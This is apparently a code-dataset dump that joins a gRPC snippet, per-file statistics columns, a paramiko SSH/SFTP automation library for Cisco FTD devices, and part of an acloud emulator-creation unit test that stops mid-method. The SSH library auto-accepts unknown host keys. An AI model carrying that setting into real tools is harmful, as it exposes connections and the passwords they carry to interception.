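        # Unary call; streaming RPCs such as MoveAbsolute return an iterator instead.
        return stub.GetPosition(singleaxis_pb2.GetPositionRequest())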
| 54.13253
| 135
| 0.804807
| 929
| 8,986
| 7.302476
| 0.094726
| 0.0824
| 0.116745
| 0.131338
| 0.865566
| 0.865566
| 0.865566
| 0.812058
| 0.812058
| 0.803803
| 0
| 0.005519
| 0.132985
| 8,986
| 165
| 136
| 54.460606
| 0.865229
| 0.075117
| 0
| 0.37594
| 1
| 0
| 0.133301
| 0.079087
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075188
| false
| 0.075188
| 0.015038
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
4e4e48198b17912aa75dd1732ddeaf3694f46ac7
| 20,782
|
py
|
Python
|
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | 1
|
2021-02-03T20:20:42.000Z
|
2021-02-03T20:20:42.000Z
|
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | null | null | null |
Devmiko/__init__.py
|
vsantiago113/Devmiko
|
743bb53f8b3d0af4621d86058df4ae6e7f782715
|
[
"MIT"
] | null | null | null |
import paramiko
import time
import re
import warnings
import sys
import logging
from tqdm import tqdm
import socket
warnings.filterwarnings(action='ignore', module='.*paramiko.*')
class DevmikoSSHException(Exception):
pass
class DevmikoAuthenticationException(Exception):
pass
class TqdmWrap(tqdm):
def view_progressbar(self, a, b):
self.total = b
self.update(a - self.n)
def set_debug(filename=None, level='DEBUG'):
logger = logging.getLogger('paramiko')
level = logging.getLevelName(level)
logger.setLevel(level)
fh = logging.FileHandler('paramiko.log' if not filename else filename)
ch = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
return logger
class SSHClient:
def __init__(self, debug=False, filename=None, level='DEBUG'):
self.__conn = None
self.channel = None
self.output = ''
self.default_string = r'(?:\$[\s]?)|(?:>[\s]?)|(?:#[\s]?)$'
self.wait_time = 0.2
self.buffer = 1024
self.max_iterations = 100
self.__password = ''
self.logger = None
self.debug = debug
self.prompt = None
if debug:
self.logger = set_debug(filename, level)
def connect(self, *args, **kwargs):
self.__password = kwargs.get('password', '')
expect_string = kwargs.get('expect_string', self.default_string)
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
self.channel = self.__conn.invoke_shell(width=160, height=2048)
self.channel.settimeout(5.0)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0
time.sleep(self.wait_time)
self.output += self.channel.recv(self.buffer).decode('UTF-8')
if re.search(expect_string, self.output, flags=re.IGNORECASE | re.MULTILINE):
break
else:
count += 1
time.sleep(self.wait_time)
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def send_command(self, command='', expect_string=''):
expect_string = self.default_string if not expect_string else expect_string
count = 0
session_output = ''
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.send_ready():
try:
self.channel.sendall(f'{command}\n')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
time.sleep(self.wait_time)
break
else:
count += 1
time.sleep(self.wait_time)
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0  # reset the stall counter once data arrives (mirrors connect())
time.sleep(self.wait_time)
try:
string = self.channel.recv(self.buffer).decode('UTF-8')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
if self.debug:
self.logger.debug(string)
if string:
if self.__password in string:
string = string.replace(self.__password, '*' * 20)
session_output += string
self.output += string
if re.search(expect_string, string, flags=re.IGNORECASE | re.MULTILINE):
self.prompt = session_output.splitlines()[-1]
return session_output
else:
count += 1
time.sleep(self.wait_time)
class SFTPClient:
def __init__(self):
self.__conn = None
self.channel = None
def connect(self, *args, **kwargs):
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
self.channel = self.__conn.open_sftp()
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def get_with_progressbar(self, remote_file=None, local_file=None):
with TqdmWrap(ascii=True, unit='b', unit_scale=True) as progressbar:
self.channel.get(remote_file, local_file, callback=progressbar.view_progressbar)
def put_with_progressbar(self, local_file=None, remote_file=None):
with TqdmWrap(ascii=True, unit='b', unit_scale=True) as progressbar:
self.channel.put(local_file, remote_file, callback=progressbar.view_progressbar)
class FTDClient:
def __init__(self, debug=False, filename=None, level='DEBUG'):
self.__conn = None
self.channel = None
self.output = ''
self.default_string = r'(?:\$[\s]?)|(?:>[\s]?)|(?:#[\s]?)$'
self.wait_time = 0.2
self.buffer = 1024
self.max_iterations = 100
self.__password = ''
self.logger = None
self.debug = debug
self.system_hostname = None
self.regular_mode = True
self.diagnostic_cli_mode = False
self.clish_mode = False
self.lina_mode = False
self.expert_mode = False
self.prompt = None
if debug:
self.logger = set_debug(filename, level)
def connect(self, *args, **kwargs):
self.__password = kwargs.get('password', '')
expect_string = kwargs.get('expect_string', self.default_string)
self.__conn = paramiko.SSHClient()
self.__conn.load_system_host_keys()
self.__conn.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
self.__conn.connect(*args, **kwargs)
self.channel = self.__conn.invoke_shell(width=160, height=2048)
self.channel.settimeout(5.0)
except (paramiko.ssh_exception.AuthenticationException,
paramiko.ssh_exception.PartialAuthentication,
paramiko.ssh_exception.BadAuthenticationType,
paramiko.ssh_exception.PasswordRequiredException,
paramiko.ssh_exception.BadHostKeyException) as e:
self.disconnect()
raise DevmikoAuthenticationException(e)
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0
time.sleep(self.wait_time)
self.output += self.channel.recv(self.buffer).decode('UTF-8')
if re.search(expect_string, self.output, flags=re.IGNORECASE | re.MULTILINE):
break
else:
count += 1
time.sleep(self.wait_time)
def disconnect(self):
if self.channel:
self.channel.close()
if self.__conn:
self.__conn.close()
def send_command(self, command='', expect_string=''):
expect_string = self.default_string if not expect_string else expect_string
count = 0
session_output = ''
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.send_ready():
try:
self.channel.sendall(f'{command}\n')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
time.sleep(self.wait_time)
break
else:
count += 1
time.sleep(self.wait_time)
count = 0
while True:
if count >= self.max_iterations:
sys.stdout.write('Max iterations exceeded!')
break
if self.channel.recv_ready():
count = 0  # reset the stall counter once data arrives (mirrors connect())
time.sleep(self.wait_time)
try:
string = self.channel.recv(self.buffer).decode('UTF-8')
except (paramiko.ssh_exception.NoValidConnectionsError,
paramiko.ssh_exception.SSHException,
paramiko.ssh_exception.ProxyCommandFailure,
paramiko.ssh_exception.ChannelException,
paramiko.ssh_exception.ConfigParseError,
paramiko.ssh_exception.CouldNotCanonicalize,
socket.error, socket.timeout, TypeError) as e:
self.disconnect()
raise DevmikoSSHException(e)
else:
if self.debug:
self.logger.debug(string)
if string:
if self.__password in string:
string = string.replace(self.__password, '*' * 20)
session_output += string
self.output += string
if re.search(expect_string, string, flags=re.IGNORECASE | re.MULTILINE):
self.prompt = session_output.splitlines()[-1]
return session_output
else:
count += 1
time.sleep(self.wait_time)
def __enter_diagnostic_cli(self):
output = self.send_command(command='system support diagnostic-cli')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
def __enter_expert(self):
output = self.send_command(command='expert')
if re.search(r'(?:\$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):  # escape "$" so it matches the literal expert-shell prompt, not end-of-line
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
def __enter_clish(self):
output = self.send_command(command='expert')
if re.search(r'(?:\$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
self.send_command(command='clish')
def __enter_lina(self):
output = self.send_command(command='expert')
if re.search(r'(?:\$[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='sudo su', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command=self.__password)
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
def __exit_expert_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_lina_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_diagnostic_cli_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
def __exit_clish_mode(self):
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='exit')
def enter_regular_mode(self):
if self.regular_mode:
pass
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
elif self.lina_mode:
self.__exit_lina_mode()
elif self.expert_mode:
self.__exit_expert_mode()
elif self.clish_mode:
self.__exit_clish_mode()
self.regular_mode = True
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = False
self.clish_mode = False
def enter_diagnostic_cli_mode(self):
if self.regular_mode:
self.__enter_diagnostic_cli()
elif self.diagnostic_cli_mode:
pass
elif self.lina_mode:
self.__exit_lina_mode()
self.__enter_diagnostic_cli()
elif self.expert_mode:
self.__exit_expert_mode()
self.__enter_diagnostic_cli()
elif self.clish_mode:
self.__exit_clish_mode()
self.__enter_diagnostic_cli()
self.regular_mode = False
self.diagnostic_cli_mode = True
self.lina_mode = False
self.expert_mode = False
self.clish_mode = False
def enter_lina_mode(self):
if self.regular_mode:
self.__enter_lina()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_lina()
elif self.lina_mode:
pass
elif self.expert_mode:
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
elif self.clish_mode:
self.send_command(command='exit')
output = self.send_command(command='sfconsole')
if re.search(r'(?:>[\s]?$)', output, flags=re.IGNORECASE | re.MULTILINE):
output = self.send_command(command='enable', expect_string=r'([Pp]assword:\s)|(?:#[\s]?)$')
if re.search(r'[Pp]assword: $', output, flags=re.IGNORECASE | re.MULTILINE):
self.send_command(command='\n')
self.send_command(command='terminal pager 0')
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = True
self.expert_mode = False
self.clish_mode = False
def enter_expert_mode(self):
if self.regular_mode:
self.__enter_expert()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_expert()
elif self.lina_mode:
self.send_command(command='exit')
self.send_command(command='exit')
elif self.expert_mode:
pass
elif self.clish_mode:
self.send_command(command='exit')
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = True
self.clish_mode = False
def enter_clish_mode(self):
if self.regular_mode:
self.__enter_clish()
elif self.diagnostic_cli_mode:
self.__exit_diagnostic_cli_mode()
self.__enter_clish()
elif self.lina_mode:
self.send_command(command='exit')
self.send_command(command='exit')
self.send_command(command='clish')
elif self.expert_mode:
self.send_command(command='clish')
elif self.clish_mode:
pass
self.regular_mode = False
self.diagnostic_cli_mode = False
self.lina_mode = False
self.expert_mode = False
self.clish_mode = True
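A minimal, hypothetical usage sketch of the three clients defined above; the hosts, credentials, file paths and commands are placeholders, and the FTD calls simply exercise the enter_*_mode helpers.
# Hypothetical usage of the Devmiko clients above; hosts, credentials and
# commands are placeholders (TEST-NET addresses).
def example_usage():
    # Interactive shell over SSH.
    ssh = SSHClient(debug=False)
    ssh.connect('192.0.2.10', username='admin', password='secret')
    print(ssh.send_command('show version'))
    print(ssh.prompt)  # last prompt seen after the command
    ssh.disconnect()

    # File transfer with a tqdm progress bar.
    sftp = SFTPClient()
    sftp.connect('192.0.2.10', username='admin', password='secret')
    sftp.get_with_progressbar(remote_file='/var/log/messages',
                              local_file='messages.log')
    sftp.disconnect()

    # Cisco FTD session that hops between CLI modes.
    ftd = FTDClient()
    ftd.connect('192.0.2.20', username='admin', password='secret')
    ftd.enter_expert_mode()
    print(ftd.send_command('ls /ngfw'))
    ftd.enter_regular_mode()
    ftd.disconnect()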
| 38.772388
| 107
| 0.578048
| 2,121
| 20,782
| 5.437058
| 0.083451
| 0.05437
| 0.098855
| 0.085848
| 0.905914
| 0.891953
| 0.876604
| 0.866805
| 0.839664
| 0.825702
| 0
| 0.004674
| 0.320566
| 20,782
| 535
| 108
| 38.84486
| 0.81204
| 0
| 0
| 0.880694
| 0
| 0
| 0.050524
| 0.012703
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060738
| false
| 0.045553
| 0.017354
| 0
| 0.097614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e71a934d3f5bcf1432630e5adda8570805eb63f
| 18,528
|
py
|
Python
|
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
public/actions/create_goldfish_action_test.py
|
CarbonROM/android_tools_acloud
|
0ed5352df639789767d8ea6fe0a510d7a84cfdcc
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2018 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for acloud.public.actions.create_goldfish_actions."""
import uuid
import unittest
from unittest import mock
from acloud.internal import constants
from acloud.internal.lib import android_build_client
from acloud.internal.lib import android_compute_client
from acloud.internal.lib import auth
from acloud.internal.lib import driver_test_lib
from acloud.internal.lib import goldfish_compute_client
from acloud.internal.lib import ssh
from acloud.public.actions import create_goldfish_action
class CreateGoldfishActionTest(driver_test_lib.BaseDriverTest):
"""Tests create_goldfish_action."""
IP = ssh.IP(external="127.0.0.1", internal="10.0.0.1")
INSTANCE = "fake-instance"
IMAGE = "fake-image"
BUILD_TARGET = "fake-build-target"
EMULATOR_BUILD_TARGET = "emu-fake-target"
BUILD_ID = "12345"
EMULATOR_BUILD_ID = "1234567"
GPU = "nvidia-tesla-k80"
BRANCH = "fake-branch"
EMULATOR_BRANCH = "emu-fake-branch"
KERNEL_BRANCH = "fake-kernel-branch"
KERNEL_BUILD_ID = "54321"
KERNEL_BUILD_TARGET = "kernel"
GOLDFISH_HOST_IMAGE_NAME = "fake-stable-host-image-name"
GOLDFISH_HOST_IMAGE_PROJECT = "fake-stable-host-image-project"
EXTRA_DATA_DISK_GB = 4
EXTRA_SCOPES = None
LAUNCH_ARGS = "fake-args"
def setUp(self):
"""Sets up the test."""
super(CreateGoldfishActionTest, self).setUp()
self.build_client = mock.MagicMock()
self.Patch(
android_build_client,
"AndroidBuildClient",
return_value=self.build_client)
self.compute_client = mock.MagicMock()
self.Patch(
goldfish_compute_client,
"GoldfishComputeClient",
return_value=self.compute_client)
self.Patch(
android_compute_client,
"AndroidComputeClient",
return_value=self.compute_client)
self.Patch(auth, "CreateCredentials", return_value=mock.MagicMock())
#Initialize new avd_spec
self.avd_spec = mock.MagicMock()
self.avd_spec.cfg = self._CreateCfg()
self.avd_spec.remote_image = {constants.BUILD_ID: self.BUILD_ID,
constants.BUILD_BRANCH: self.BRANCH,
constants.BUILD_TARGET: self.BUILD_TARGET}
self.avd_spec.emulator_build_id = self.EMULATOR_BUILD_ID
self.avd_spec.gpu = self.GPU
self.avd_spec.serial_log_file = None
self.avd_spec.autoconnect = False
def _CreateCfg(self):
"""A helper method that creates a mock configuration object."""
cfg = mock.MagicMock()
cfg.service_account_name = "fake@service.com"
cfg.service_account_private_key_path = "/fake/path/to/key"
cfg.zone = "fake_zone"
cfg.ssh_private_key_path = ""
cfg.ssh_public_key_path = ""
cfg.stable_goldfish_host_image_name = self.GOLDFISH_HOST_IMAGE_NAME
cfg.stable_goldfish_host_image_project = self.GOLDFISH_HOST_IMAGE_PROJECT
cfg.emulator_build_target = self.EMULATOR_BUILD_TARGET
cfg.extra_data_disk_size_gb = self.EXTRA_DATA_DISK_GB
cfg.extra_scopes = self.EXTRA_SCOPES
cfg.launch_args = self.LAUNCH_ARGS
return cfg
def testCreateDevices(self):
"""Tests CreateDevices."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
none_avd_spec = None
# Call CreateDevices with avd_spec is None
report = create_goldfish_action.CreateDevices(
none_avd_spec, cfg, build_target=self.BUILD_TARGET,
build_id=self.BUILD_ID, emulator_build_id=self.EMULATOR_BUILD_ID,
gpu=self.GPU,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [
{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},
],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
def testCreateDevicesWithoutBuildId(self):
"""Test CreateDevices when emulator sysimage buildid is not provided."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
# Mock _FetchBuildIdFromFile method
self.Patch(
create_goldfish_action,
"_FetchBuildIdFromFile",
return_value=self.BUILD_ID)
none_avd_spec = None
# Call CreateDevices with no avd_spec
report = create_goldfish_action.CreateDevices(
none_avd_spec,
cfg,
build_target=self.BUILD_TARGET,
build_id=None,
emulator_build_id=self.EMULATOR_BUILD_ID,
emulator_branch=None,
gpu=self.GPU,
branch=None,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=none_avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
self.assertEqual(report.data, {
"devices": [{
"instance_name": self.INSTANCE,
"ip": self.IP.external,
"branch": self.BRANCH,
"build_id": self.BUILD_ID,
"build_target": self.BUILD_TARGET,
"emulator_branch": self.EMULATOR_BRANCH,
"emulator_build_id": self.EMULATOR_BUILD_ID,
"emulator_build_target": self.EMULATOR_BUILD_TARGET,
"kernel_branch": self.KERNEL_BRANCH,
"kernel_build_id": self.KERNEL_BUILD_ID,
"kernel_build_target": self.KERNEL_BUILD_TARGET,
},],
})
self.assertEqual(report.command, "create_gf")
self.assertEqual(report.status, "SUCCESS")
# Call CreateDevices with avd_spec
self.build_client.GetBranch.side_effect = [
self.BRANCH, self.EMULATOR_BRANCH
]
# TODO: Break out avd spec testing into its own testcase.
# Mock build client method
self.build_client.GetBuildInfo.side_effect = [
android_build_client.BuildInfo(
self.BRANCH, self.BUILD_ID, self.BUILD_TARGET, None),
android_build_client.BuildInfo(
self.EMULATOR_BRANCH, self.EMULATOR_BUILD_ID,
self.EMULATOR_BUILD_TARGET, None),
android_build_client.BuildInfo(
self.KERNEL_BRANCH, self.KERNEL_BUILD_ID,
self.KERNEL_BUILD_TARGET, None)]
report = create_goldfish_action.CreateDevices(avd_spec=self.avd_spec)
# Verify
self.compute_client.CreateInstance.assert_called_with(
instance=self.INSTANCE,
blank_data_disk_size_gb=self.EXTRA_DATA_DISK_GB,
image_name=self.GOLDFISH_HOST_IMAGE_NAME,
image_project=self.GOLDFISH_HOST_IMAGE_PROJECT,
build_target=self.BUILD_TARGET,
branch=self.BRANCH,
build_id=self.BUILD_ID,
emulator_branch=self.EMULATOR_BRANCH,
emulator_build_id=self.EMULATOR_BUILD_ID,
kernel_branch=self.KERNEL_BRANCH,
kernel_build_id=self.KERNEL_BUILD_ID,
kernel_build_target=self.KERNEL_BUILD_TARGET,
gpu=self.GPU,
avd_spec=self.avd_spec,
extra_scopes=self.EXTRA_SCOPES,
tags=None,
launch_args=self.LAUNCH_ARGS)
#pylint: disable=invalid-name
def testCreateDevicesWithoutEmulatorBuildId(self):
"""Test CreateDevices when emulator build id is not provided."""
cfg = self._CreateCfg()
# Mock uuid
fake_uuid = mock.MagicMock(hex="1234")
self.Patch(uuid, "uuid4", return_value=fake_uuid)
# Mock compute client methods
self.compute_client.GetInstanceIP.return_value = self.IP
self.compute_client.GenerateImageName.return_value = self.IMAGE
self.compute_client.GenerateInstanceName.return_value = self.INSTANCE
# Mock build client method
